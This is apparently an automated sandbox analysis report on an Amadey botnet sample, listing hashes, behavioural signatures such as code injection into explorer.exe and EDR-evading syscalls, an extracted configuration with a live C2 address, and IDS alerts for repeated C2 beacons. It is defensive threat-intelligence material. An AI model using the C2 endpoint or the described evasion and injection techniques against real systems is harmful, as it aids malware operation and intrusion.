
Windows Analysis Report
pTvHtQDXio.exe

Overview

General Information

Sample name: pTvHtQDXio.exe (renamed because the original name is a hash value)
Original sample name: 7c23cca92ddabc20911e0c51e19b002b.exe
Analysis ID: 1576147
MD5: 7c23cca92ddabc20911e0c51e19b002b
SHA1: f0e07a68ca36681ece42c23d75351d51a9b52a8c
SHA256: 471f22db8436b846bcc1b8d9691adb74d02cee7b49e4a58772f486ece4ca19db
Tags: Amadey, exe, user-abuse_ch

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey's Clipper DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • pTvHtQDXio.exe (PID: 8060 cmdline: "C:\Users\user\Desktop\pTvHtQDXio.exe" MD5: 7C23CCA92DDABC20911E0C51E19B002B)
    • more.com (PID: 8132 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 2972 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • comet.exe (PID: 7580 cmdline: C:\Users\user\AppData\Roaming\ancar\comet.exe MD5: 7C23CCA92DDABC20911E0C51E19B002B)
    • WerFault.exe (PID: 2896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7580 -s 640 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Extracted malware configuration:
{"C2 url": "62.60.226.15/8fj482jd9/index.php", "Version": "5.10", "Install Folder": "f39a3c5206", "Install File": "Gxtuum.exe"}
Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\nlhiojbr | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
00000002.00000002.1577858534.0000000005CD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
2.2.more.com.5cd00c8.7.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
10.2.explorer.exe.3200000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
2.2.more.com.5cd00c8.7.raw.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-16T15:26:45.224974+0100 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.10 | 49714 | 62.60.226.15 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-16T15:26:48.353310+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49715 | 62.60.226.15 | 80 | TCP
2024-12-16T15:26:54.291473+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49719 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:00.400999+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49724 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:06.394649+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49729 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:12.443161+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49731 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:18.378506+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49733 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:24.316666+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49736 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:30.416977+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49738 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:36.331229+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49740 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:44.971085+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49742 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:50.897185+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49745 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:56.847198+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49747 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:02.875484+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49749 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:08.862170+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49751 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:14.913330+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49753 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:20.870653+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49755 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:26.839464+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49757 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:32.799344+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49759 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:38.754130+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49761 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:44.747663+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49763 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:50.703438+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49765 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:56.644659+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49767 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:02.594430+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49769 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:08.634245+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49771 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:14.555622+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49773 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:20.475157+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49775 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:26.426738+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49777 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:32.365433+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49779 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:38.291763+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49781 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:44.244429+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49783 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:50.245706+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49785 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:56.163704+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49787 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:02.089631+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49789 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:08.182139+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49791 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:14.166027+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49793 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:20.087650+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49795 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:26.007164+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49797 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:31.953635+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.10 | 49799 | 62.60.226.15 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-16T15:26:45.224974+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49714 | 62.60.226.15 | 80 | TCP
2024-12-16T15:26:51.362062+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49717 | 62.60.226.15 | 80 | TCP
2024-12-16T15:26:57.320156+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49721 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:03.413713+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49726 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:09.529479+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49730 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:15.474901+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49732 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:21.399440+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49735 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:27.406642+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49737 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:33.426547+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49739 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:39.344102+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49741 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:47.992324+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49744 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:53.914198+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49746 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:59.914671+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49748 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:05.950272+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49750 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:11.888302+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49752 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:17.950542+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49754 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:23.925340+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49756 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:29.870544+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49758 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:35.817002+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49760 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:41.845113+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49762 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:47.798530+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49764 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:53.721470+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49766 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:59.674367+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49768 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:05.614851+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49770 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:11.647684+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49772 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:17.565382+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49774 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:23.497436+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49776 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:29.457152+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49778 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:35.385154+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49780 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:41.307857+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49782 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:47.343687+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49784 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:53.259229+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49786 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:59.176037+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49788 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:05.282733+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49790 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:11.266405+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49792 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:17.187703+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49794 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:23.097527+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49796 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:29.047734+0100 | 2856097 | 1 | A Network Trojan was detected | 192.168.2.10 | 49798 | 62.60.226.15 | 80 | TCP

AV Detection

Source: 00000002.00000002.1577858534.0000000005CD0000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "62.60.226.15/8fj482jd9/index.php", "Version": "5.10", "Install Folder": "f39a3c5206", "Install File": "Gxtuum.exe"}
Source: C:\Users\user\AppData\Local\Temp\nlhiojbr | ReversingLabs: Detection: 50%
Source: pTvHtQDXio.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\nlhiojbr | Joe Sandbox ML: detected
Source: pTvHtQDXio.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: pTvHtQDXio.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP | source: pTvHtQDXio.exe, 00000000.00000002.1463469502.0000000005360000.00000004.00000800.00020000.00000000.sdmp, pTvHtQDXio.exe, 00000000.00000002.1460844166.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576734242.0000000005200000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000002.00000002.1576008182.0000000004D71000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894571477.0000000004F5E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3895341723.00000000053E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: pTvHtQDXio.exe, 00000000.00000002.1463469502.0000000005360000.00000004.00000800.00020000.00000000.sdmp, pTvHtQDXio.exe, 00000000.00000002.1460844166.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576734242.0000000005200000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000002.00000002.1576008182.0000000004D71000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894571477.0000000004F5E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3895341723.00000000053E0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SysWOW64\more.com | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_0323F271 FindFirstFileExW,10_2_0323F271

Networking

Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49714 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.10:49714 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49717 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49735 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49726 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49724 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49729 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49742 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49749 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49747 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49738 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49745 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49748 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49740 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49739 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49750 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49755 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49762 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49731 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49760 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49753 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49765 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49754 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49756 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49773 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49770 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49775 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49761 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49766 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49780 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49781 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49767 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49779 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49796 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49785 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49794 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49790 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49774 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49789 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49792 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49793 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49791 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49759 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49788 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.10:49784 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49787 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49797 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49795 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49777 -> 62.60.226.15:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.10:49783 -> 62.60.226.15:80
